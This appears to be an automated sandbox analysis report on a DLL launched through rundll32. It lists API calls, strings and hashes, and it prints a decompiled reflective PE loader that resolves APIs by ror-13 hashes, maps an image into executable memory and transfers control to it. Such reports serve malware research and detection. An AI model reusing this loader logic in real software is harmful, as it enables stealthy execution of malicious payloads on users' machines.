Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtReleaseKeyedEvent$ntdll
API String ID: 1646373207-31681898
Opcode ID: bb3510bcda6a4ae0e5db69ff75fe2e4ebbf6ffea9f002ee44e5f4dfe89757af3
Instruction ID: eba0bbeb6caaebec2256050df1304cf185e865f7594bc8cb0e8675f9860a29b7
Opcode Fuzzy Hash: bb3510bcda6a4ae0e5db69ff75fe2e4ebbf6ffea9f002ee44e5f4dfe89757af3
Instruction Fuzzy Hash: F9B092B0A00B036ADEA07AF58A8CA9B399AB9812113428540A022FD140FA2480859D2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2C0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C2C5
GetProcAddress.KERNEL32(00000000,NtWaitForKeyedEvent), ref: 6EA8C2D5

Strings

NtWaitForKeyedEvent, xrefs: 6EA8C2CF
ntdll, xrefs: 6EA8C2C0

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtWaitForKeyedEvent$ntdll
API String ID: 1646373207-2815205136
Opcode ID: 948645f71f237e1b56ecffe30a587964ab7f0b1ac7cff089c0bd7c04a844ee3c
Instruction ID: 384a62f83ff31b998d41c8e2070128b91985ad9682b4829b8e533bf753eb04e5
Opcode Fuzzy Hash: 948645f71f237e1b56ecffe30a587964ab7f0b1ac7cff089c0bd7c04a844ee3c
Instruction Fuzzy Hash: 7AB09BB0940B025EDDD07AF5894C65A3966754125134144406115ED140E51480459D65

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C260, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6EA8C265
GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6EA8C275

Strings

GetSystemTimePreciseAsFileTime, xrefs: 6EA8C26F
kernel32, xrefs: 6EA8C260

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemTimePreciseAsFileTime$kernel32
API String ID: 1646373207-392834919
Opcode ID: ca61df8d7cb69a248927ea54f9c1c991b67fe9e3c842d8a88fb9f3310042f94b
Instruction ID: 910768171c1c05ad4e38140f967a895f84874832a44e195eafc55b1e6138d57f
Opcode Fuzzy Hash: ca61df8d7cb69a248927ea54f9c1c991b67fe9e3c842d8a88fb9f3310042f94b
Instruction Fuzzy Hash: 14B092B0640B026AEEA06EF58A8CA5E39ABB9822417028980A111ED140EA24C0C5AD2A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C300, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C305
GetProcAddress.KERNEL32(00000000,NtCreateKeyedEvent), ref: 6EA8C315

Strings

ntdll, xrefs: 6EA8C300
NtCreateKeyedEvent, xrefs: 6EA8C30F

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: NtCreateKeyedEvent$ntdll
API String ID: 1646373207-1373576770
Opcode ID: 664fda096b8c0330d8e3fdb1c2649a746885dc6224536d09a27fa0122597da7b
Instruction ID: b4e23696761bd570cf6c5647d6e5bccb92cff821ffe3bb5882a05287f3b00f9f
Opcode Fuzzy Hash: 664fda096b8c0330d8e3fdb1c2649a746885dc6224536d09a27fa0122597da7b
Instruction Fuzzy Hash: 88B09B70900B025FDD906AF5494C55B3956F55135134184407061ED101D51484469D29

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA6749, Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(26B76B9F,?,00000000,?), ref: 6EAA67AC

Part of subcall function 6EAA4073: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,6EAA61E2,?,00000000,-00000008), ref: 6EAA411F

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6EAA6A07
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6EAA6A4F
GetLastError.KERNEL32 ref: 6EAA6AF2

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: ba1c1b61589bd10ebb054089067c74aa241fa773fdbbcb4d1b696b0160eaaab1
Instruction ID: 447df1aaee1f28ce98502679b57abca7eaa9079692686f0636b3e176fc0a9405
Opcode Fuzzy Hash: ba1c1b61589bd10ebb054089067c74aa241fa773fdbbcb4d1b696b0160eaaab1
Instruction Fuzzy Hash: F1D136B5D106599FCB01CFECC8809EDBBB4EF49314F18852AE956AB341D730A882CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA92470, Relevance: 6.2, APIs: 4, Instructions: 215COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 6EA92601
WriteConsoleW.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 6EA92653
GetLastError.KERNEL32(?,?,?), ref: 6EA9265D
GetLastError.KERNEL32(?,?,?), ref: 6EA926C5

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleErrorLastWrite
String ID:
API String ID: 4006445483-0
Opcode ID: bcbc26d6ef7529d27e2489fa848ed5d512a9c4380da496e41b61217ff637836f
Instruction ID: 896373fc4ed650b277738c30e642a46e6bc592f70abad02b00d026ed43e76072
Opcode Fuzzy Hash: bcbc26d6ef7529d27e2489fa848ed5d512a9c4380da496e41b61217ff637836f
Instruction Fuzzy Hash: E761BD316283168BE7148E99EC9076A77E2EBC4304F188839E595873C4F775CCC1A7BA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F49F, Relevance: 6.2, APIs: 4, Instructions: 168COMMON

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6EA9F566
___AdjustPointer.LIBCMT ref: 6EA9F589
___AdjustPointer.LIBCMT ref: 6EA9F625

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 350d142b1aff1e63bf32f044fb0b4b4a36d3d4de43bf2ef2281297c2da0b9abf
Instruction ID: 43a499846d370d0eacef2aa949a844f528770bffbacb5cafb2165ef01b5c2f85
Opcode Fuzzy Hash: 350d142b1aff1e63bf32f044fb0b4b4a36d3d4de43bf2ef2281297c2da0b9abf
Instruction Fuzzy Hash: B251C17A625602AFDB148F94D950BBA73E4FF40314F34492DF92587290DB31E8C0EB98

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA7EA6, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000), ref: 6EAA7EBD
GetLastError.KERNEL32(?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?,?,?,6EAA70CD,?), ref: 6EAA7EC9

Part of subcall function 6EAA7E8F: CloseHandle.KERNEL32(FFFFFFFE,6EAA7ED9,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?,?), ref: 6EAA7E9F

___initconout.LIBCMT ref: 6EAA7ED9

Part of subcall function 6EAA7E51: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6EAA7E80,6EAA7844,?,?,6EAA6B46,?,?,00000000,?), ref: 6EAA7E64

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,6EAA7857,?,00000001,?,?,?,6EAA6B46,?,?,00000000,?), ref: 6EAA7EEE

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: f1a35e529e72ce2a034dd720c433d3519c56de045483bc37b50823cb234c3310
Instruction ID: 68181663f14d0daf6f336906252e44b261cb23c7e891336fc477e7d65c6f78a4
Opcode Fuzzy Hash: f1a35e529e72ce2a034dd720c433d3519c56de045483bc37b50823cb234c3310
Instruction Fuzzy Hash: 99F01C36400719BBCF221FD9CC04A9F7F76EB0A3A0B06C414FA18AA564C7328CA1DB94

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9FAA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6EA9FAC5

Strings

MOC, xrefs: 6EA9FAD7
RCC, xrefs: 6EA9FADF

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 32a13d7f8404830e88622a178ed4aab23bd0ea575cec5364be2519b6a2359e2b
Instruction ID: bf43b1305ebede841def81cf71776f2bdc6ff783585fc6583a24775a8267e80b
Opcode Fuzzy Hash: 32a13d7f8404830e88622a178ed4aab23bd0ea575cec5364be2519b6a2359e2b
Instruction Fuzzy Hash: DC41677691020AAFCF02CFD8C990AEE7BF9BF08304F288499F915A7254D335D991EB54

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6404 Parent PID: 4668 rundll32.exeCOMMON

Executed Functions

Function 6EA9C050, Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 394
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 62%

			E6EA9C050(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t137;
				intOrPtr _t139;
				struct HDC__* _t144;
				void* _t152;
				signed int _t153;
				void* _t154;
				void* _t164;
				signed int _t167;
				signed int _t169;
				unsigned short _t171;
				void* _t176;
				signed int _t178;
				char _t189;
				void* _t192;
				signed int _t193;
				signed int _t196;
				signed int _t202;
				intOrPtr _t204;
				signed int _t205;
				signed int _t207;
				intOrPtr _t208;
				void* _t209;
				void* _t210;
				signed int _t212;
				signed int _t215;
				intOrPtr _t216;
				intOrPtr* _t219;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed short _t230;
				void* _t235;
				signed int _t236;
				signed int _t237;
				void* _t241;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t249;
				signed int _t250;
				intOrPtr* _t252;
				intOrPtr* _t255;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t260;
				unsigned int _t262;
				intOrPtr* _t264;
				void* _t265;
				void* _t266;
				signed int* _t268;
				signed int _t270;
				signed int _t271;
				intOrPtr* _t273;
				signed int _t277;
				void* _t278;
				signed int _t279;
				void* _t280;
				signed int _t281;
				void* _t283;
				signed int _t285;
				signed int _t286;
				signed int _t288;
				signed char* _t289;
				intOrPtr _t290;
				signed int _t292;
				void* _t293;
				signed short* _t296;
				void* _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;

				_t137 =  *0x6eadd804; // 0x877aaf3f
				 *(_t299 + 0x4c) = _t137 ^ _t299;
				_t255 =  *((intOrPtr*)(_t299 + 0x64));
				_push(0x400);
				 *((intOrPtr*)(_t299 + 0x2c)) = _t255;
				_t139 = E6EA9C70E(__eflags);
				_t256 =  *_t255;
				_t300 = _t299 + 4;
				_t202 = 0;
				 *((intOrPtr*)(_t300 + 0x2c)) = _t139;
				 *(_t300 + 0x24) = 0;
				 *(_t300 + 0x18) = 0;
				 *(_t300 + 0x20) = 0;
				L1:
				while(1) {
					if( *_t256 != 0x5a4d) {
						L4:
						_t256 = _t256 - 1;
						continue;
					}
					_t216 =  *((intOrPtr*)(_t256 + 0x3c));
					if(_t216 - 0x40 > 0x3bf ||  *((intOrPtr*)(_t216 + _t256)) != 0x4550) {
						goto L4;
					}
					 *((intOrPtr*)(_t300 + 0x14)) = _t256;
					_t292 =  *( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x14);
					 *(_t300 + 0x1c) = _t292;
					__eflags = _t292;
					if(_t292 != 0) {
						do {
							_t289 =  *(_t292 + 0x28);
							_t236 = 0;
							__eflags = 0;
							_t250 =  *(_t292 + 0x24) & 0x0000ffff;
							do {
								_t271 =  *_t289 & 0x000000ff;
								asm("ror ecx, 0xd");
								__eflags =  *_t289 - 0x61;
								if( *_t289 >= 0x61) {
									_t236 = _t236 + 0xffffffe0;
									__eflags = _t236;
								}
								_t250 = _t250 + 0xffff;
								_t236 = _t236 + _t271;
								_t289 =  &(_t289[1]);
								__eflags = _t250;
							} while (_t250 != 0);
							__eflags = _t236 - 0x6a4abc5b;
							if(_t236 == 0x6a4abc5b) {
								_t290 =  *((intOrPtr*)(_t292 + 0x10));
								_t298 = 3;
								_t192 =  *((intOrPtr*)( *((intOrPtr*)(_t290 + 0x3c)) + _t290 + 0x78)) + _t290;
								 *(_t300 + 0x10) = _t192;
								_t273 =  *((intOrPtr*)(_t192 + 0x20)) + _t290;
								_t215 =  *((intOrPtr*)(_t192 + 0x24)) + _t290;
								__eflags = _t215;
								do {
									_t252 =  *_t273 + _t290;
									_t193 = 0;
									__eflags = 0;
									_t237 =  *_t252;
									do {
										asm("ror eax, 0xd");
										_t252 = _t252 + 1;
										_t193 = _t193 + _t237;
										_t237 =  *_t252;
										__eflags = _t237;
									} while (_t237 != 0);
									__eflags = _t193 - 0xec0e4e8e;
									if(_t193 == 0xec0e4e8e) {
										L18:
										_t241 =  *((intOrPtr*)( *(_t300 + 0x10) + 0x1c)) + ( *_t215 & 0x0000ffff) * 4;
										__eflags = _t193 - 0xec0e4e8e;
										if(_t193 != 0xec0e4e8e) {
											__eflags = _t193 - 0x7c0dfcaa;
											if(_t193 != 0x7c0dfcaa) {
												__eflags = _t193 - 0x91afca54;
												if(_t193 == 0x91afca54) {
													_t196 =  *((intOrPtr*)(_t241 + _t290)) + 0x57 + _t290;
													__eflags = _t196;
													 *(_t300 + 0x20) = _t196;
												}
											} else {
												 *(_t300 + 0x18) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
											}
										} else {
											 *(_t300 + 0x24) =  *((intOrPtr*)(_t241 + _t290)) + _t290;
										}
										_t298 = _t298 + 0xffff;
										__eflags = _t298;
									} else {
										__eflags = _t193 - 0x7c0dfcaa;
										if(_t193 == 0x7c0dfcaa) {
											goto L18;
										} else {
											__eflags = _t193 - 0x91afca54;
											if(_t193 == 0x91afca54) {
												goto L18;
											}
										}
									}
									_t273 = _t273 + 4;
									_t215 = _t215 + 2;
									__eflags = _t298;
								} while (_t298 != 0);
								_t202 =  *(_t300 + 0x18);
								_t292 =  *(_t300 + 0x1c);
							}
							__eflags =  *(_t300 + 0x24);
							if( *(_t300 + 0x24) == 0) {
								goto L30;
							} else {
								__eflags = _t202;
								if(_t202 == 0) {
									goto L30;
								} else {
									__eflags =  *(_t300 + 0x20);
									if( *(_t300 + 0x20) == 0) {
										goto L30;
									}
								}
							}
							break;
							L30:
							_t292 =  *_t292;
							 *(_t300 + 0x1c) = _t292;
							__eflags = _t292;
						} while (_t292 != 0);
						_t256 =  *((intOrPtr*)(_t300 + 0x14));
					}
					 *((intOrPtr*)(_t300 + 0x34)) = GetDC;
					_t144 = GetDC(0);
					 *(_t300 + 0x3c) = GetWindowRect;
					GetWindowRect(0, _t300 + 0x3c);
					 *((intOrPtr*)(_t300 + 0x40)) = ReleaseDC;
					ReleaseDC(0, _t144);
					_t204 =  *((intOrPtr*)(_t256 + 0x3c)) + _t256;
					 *((intOrPtr*)(_t300 + 0x38)) = _t204;
					CreateFileA("asd", 0, 0, 0, 0, 0, 0);
					 *((intOrPtr*)(_t300 + 0x30)) =  *(_t300 + 0x20) - GetLastError();
					_t152 = VirtualAlloc(0,  *(_t204 + 0x50), 0x3000, 0x40); // executed
					_t243 =  *(_t204 + 0x54);
					_t293 = _t152;
					 *(_t300 + 0x10) = _t293;
					_t219 = _t256;
					__eflags = _t243;
					if(_t243 != 0) {
						_t288 = _t293 - _t256;
						__eflags = _t288;
						do {
							_t189 =  *_t219;
							_t219 = _t219 + 1;
							 *((char*)(_t288 + _t219 - 1)) = _t189;
							_t243 = _t243 - 1;
							__eflags = _t243;
						} while (_t243 != 0);
					}
					_t258 = ( *(_t204 + 0x14) & 0x0000ffff) + _t204;
					_t205 =  *(_t204 + 6) & 0x0000ffff;
					__eflags = _t205;
					if(_t205 != 0) {
						_t270 = _t258 + 0x2c;
						__eflags = _t270;
						do {
							_t205 = _t205 - 1;
							 *((char*)((_t205 & 0x000003ff) +  *((intOrPtr*)(_t300 + 0x2c)))) =  *(_t300 + 0x20);
							_t235 =  *((intOrPtr*)(_t270 - 8)) + _t293;
							_t249 =  *_t270 +  *((intOrPtr*)(_t300 + 0x14));
							_t286 =  *(_t270 - 4);
							__eflags = _t286;
							if(_t286 != 0) {
								do {
									_t235 = _t235 + 1;
									 *((char*)(_t235 - 1)) =  *_t249;
									_t249 = _t249 + 1;
									_t286 = _t286 - 1;
									__eflags = _t286;
								} while (_t286 != 0);
							}
							_t270 = _t270 + 0x28;
							__eflags = _t205;
						} while (_t205 != 0);
					}
					_t207 =  *(_t300 + 0x1c) - 0xffffff80;
					_t260 = _t293 +  *_t207;
					 *((intOrPtr*)(_t300 + 0x14)) = _t260;
					_t153 =  *(_t260 + 0xc);
					__eflags = _t153;
					if(_t153 != 0) {
						while(1) {
							__eflags =  *_t207;
							if( *_t207 == 0) {
								goto L50;
							}
							_t297 =  *((intOrPtr*)(_t300 + 0x28))(_t293 + _t153);
							_t176 =  *(_t300 + 0x10);
							_t285 =  *_t260 + _t176;
							_t268 =  *((intOrPtr*)(_t260 + 0x10)) + _t176;
							__eflags =  *_t268;
							if( *_t268 != 0) {
								asm("o16 nop [eax+eax]");
								do {
									__eflags = _t285;
									if(_t285 == 0) {
										L47:
										_t207 = _t176 +  *_t268;
										__eflags = _t207;
										_t178 =  *(_t300 + 0x20)(_t297, _t207 + 2);
									} else {
										_t230 =  *_t285;
										__eflags = _t230;
										if(_t230 >= 0) {
											goto L47;
										} else {
											_t178 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x1c)) + ((_t230 & 0x0000ffff) -  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t297 + 0x3c)) + _t297 + 0x78)) + _t297 + 0x10))) * 4 + _t297)) + _t297;
										}
									}
									 *_t268 = _t178;
									_t268 =  &(_t268[1]);
									__eflags = _t285;
									_t84 = _t285 + 4; // 0x4
									_t180 =  ==  ? _t285 : _t84;
									__eflags =  *_t268;
									_t285 =  ==  ? _t285 : _t84;
									_t176 =  *(_t300 + 0x10);
								} while ( *_t268 != 0);
							}
							_t293 =  *(_t300 + 0x10);
							_t260 =  *((intOrPtr*)(_t300 + 0x14)) + 0x14;
							 *((intOrPtr*)(_t300 + 0x14)) = _t260;
							_t153 =  *(_t260 + 0xc);
							__eflags = _t153;
							if(_t153 != 0) {
								continue;
							}
							goto L50;
						}
					}
					L50:
					_t154 =  *((intOrPtr*)(_t300 + 0x34))(0);
					 *(_t300 + 0x3c)(0, _t300 + 0x4c);
					 *((intOrPtr*)(_t300 + 0x40))(0, _t154);
					_t244 =  *(_t300 + 0x1c);
					_t262 = _t293 -  *((intOrPtr*)(_t244 + 0x34));
					__eflags =  *(_t244 + 0xa4);
					if( *(_t244 + 0xa4) != 0) {
						_t225 =  *((intOrPtr*)(_t244 + 0xa0)) + _t293;
						 *(_t300 + 0x18) = _t225;
						_t169 =  *(_t225 + 4);
						__eflags = _t169;
						if(_t169 != 0) {
							do {
								_t100 = _t169 - 8; // -8
								_t283 =  *_t225 + _t293;
								_t212 = _t100 >> 1;
								__eflags = _t212;
								_t296 = _t225 + 8;
								if(_t212 != 0) {
									do {
										_t245 =  *_t296 & 0x0000ffff;
										_t212 = _t212 - 1;
										_t226 = _t245;
										_t171 = _t245 >> 0xc;
										__eflags = _t171 - 0xa;
										if(_t171 != 0xa) {
											__eflags = _t171 - 3;
											if(_t171 != 3) {
												__eflags = _t171 - 1;
												if(_t171 != 1) {
													__eflags = _t171 - 2;
													if(_t171 == 2) {
														_t227 = _t226 & 0x00000fff;
														_t108 = _t227 + _t283;
														 *_t108 =  *(_t227 + _t283) + _t262;
														__eflags =  *_t108;
													}
												} else {
													 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + (_t262 >> 0x10);
												}
											} else {
												 *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t226 & 0x00000fff) + _t283)) + _t262;
											}
										} else {
											 *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) =  *((intOrPtr*)((_t245 & 0x00000fff) + _t283)) + _t262;
										}
										_t296 =  &(_t296[1]);
										__eflags = _t212;
									} while (_t212 != 0);
									_t225 =  *(_t300 + 0x18);
									_t169 =  *(_t225 + 4);
								}
								_t293 =  *(_t300 + 0x10);
								_t225 = _t225 + _t169;
								 *(_t300 + 0x18) = _t225;
								_t169 =  *(_t225 + 4);
								__eflags = _t169;
							} while (_t169 != 0);
							_t244 =  *(_t300 + 0x1c);
						}
					}
					 *0x6eade168 = _t293;
					_t264 =  *((intOrPtr*)(_t244 + 0x28)) + _t293;
					_t277 =  *( *((intOrPtr*)(_t293 + 0x3c)) + _t293 + 0xc0);
					__eflags = _t277;
					if(_t277 != 0) {
						_t281 =  *(_t277 + _t293 + 0xc);
						__eflags = _t281;
						if(_t281 != 0) {
							_t167 =  *_t281;
							__eflags = _t167;
							while(_t167 != 0) {
								 *_t167(_t293, 1, 0);
								_t167 =  *(_t281 + 4);
								_t281 = _t281 + 4;
								__eflags = _t167;
							}
						}
					}
					_t208 =  *((intOrPtr*)(_t300 + 0x28));
					__eflags =  *(_t208 + 0x1c);
					if( *(_t208 + 0x1c) != 0) {
						 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
						goto L77;
					} else {
						_push( *((intOrPtr*)(_t208 + 4)));
						_push(_t293);
						_t279 = E6EA9BF10();
						_t300 = _t300 + 8;
						__eflags = _t279;
						if(_t279 == 0) {
							L77:
							_pop(_t265);
							_pop(_t278);
							_pop(_t209);
							__eflags =  *(_t300 + 0x5c) ^ _t300;
							return E6EA9C717( *((intOrPtr*)(_t300 + 0x28)), _t209,  *(_t300 + 0x5c) ^ _t300, _t244, _t265, _t278);
						} else {
							__eflags =  *(_t208 + 0x20);
							if( *(_t208 + 0x20) != 0) {
								E6EA9BFE0(_t293);
								_t300 = _t300 + 4;
							}
							 *_t264( *((intOrPtr*)(_t208 + 0x10)), 1, 0);
							_t164 =  *_t279( *((intOrPtr*)(_t208 + 0xc)),  *((intOrPtr*)(_t208 + 0x10)),  *((intOrPtr*)(_t208 + 0x14)),  *((intOrPtr*)(_t208 + 0x18)));
							_pop(_t266);
							_pop(_t280);
							_pop(_t210);
							__eflags =  *(_t300 + 0x4c) ^ _t300;
							return E6EA9C717(_t164, _t210,  *(_t300 + 0x4c) ^ _t300, _t244, _t266, _t280);
						}
					}
				}
			}

0x6ea9c053
0x6ea9c05a
0x6ea9c062
0x6ea9c066
0x6ea9c06b
0x6ea9c06f
0x6ea9c074
0x6ea9c076
0x6ea9c079
0x6ea9c07b
0x6ea9c07f
0x6ea9c08c
0x6ea9c090
0x00000000
0x6ea9c094
0x6ea9c097
0x6ea9c0af
0x6ea9c0af
0x00000000
0x6ea9c0af
0x6ea9c099
0x6ea9c0a4
0x00000000
0x00000000
0x6ea9c0b8
0x6ea9c0bf
0x6ea9c0c2
0x6ea9c0c6
0x6ea9c0c8
0x6ea9c0d0
0x6ea9c0d0
0x6ea9c0d3
0x6ea9c0d3
0x6ea9c0d5
0x6ea9c0e0
0x6ea9c0e0
0x6ea9c0e3
0x6ea9c0e6
0x6ea9c0e9
0x6ea9c0eb
0x6ea9c0eb
0x6ea9c0eb
0x6ea9c0ee
0x6ea9c0f4
0x6ea9c0f6
0x6ea9c0f7
0x6ea9c0f7
0x6ea9c0fc
0x6ea9c102
0x6ea9c108
0x6ea9c10b
0x6ea9c117
0x6ea9c119
0x6ea9c123
0x6ea9c125
0x6ea9c125
0x6ea9c127
0x6ea9c129
0x6ea9c12b
0x6ea9c12b
0x6ea9c12d
0x6ea9c130
0x6ea9c130
0x6ea9c133
0x6ea9c139
0x6ea9c13b
0x6ea9c13d
0x6ea9c13d
0x6ea9c141
0x6ea9c146
0x6ea9c156
0x6ea9c160
0x6ea9c163
0x6ea9c168
0x6ea9c175
0x6ea9c17a
0x6ea9c187
0x6ea9c18c
0x6ea9c194
0x6ea9c194
0x6ea9c196
0x6ea9c196
0x6ea9c17c
0x6ea9c181
0x6ea9c181
0x6ea9c16a
0x6ea9c16f
0x6ea9c16f
0x6ea9c19a
0x6ea9c19a
0x6ea9c148
0x6ea9c148
0x6ea9c14d
0x00000000
0x6ea9c14f
0x6ea9c14f
0x6ea9c154
0x00000000
0x00000000
0x6ea9c154
0x6ea9c14d
0x6ea9c1a0
0x6ea9c1a3
0x6ea9c1a6
0x6ea9c1a6
0x6ea9c1af
0x6ea9c1b3
0x6ea9c1b3
0x6ea9c1b7
0x6ea9c1bc
0x00000000
0x6ea9c1be
0x6ea9c1be
0x6ea9c1c0
0x00000000
0x6ea9c1c2
0x6ea9c1c2
0x6ea9c1c7
0x00000000
0x00000000
0x6ea9c1c7
0x6ea9c1c0
0x00000000
0x6ea9c1c9
0x6ea9c1c9
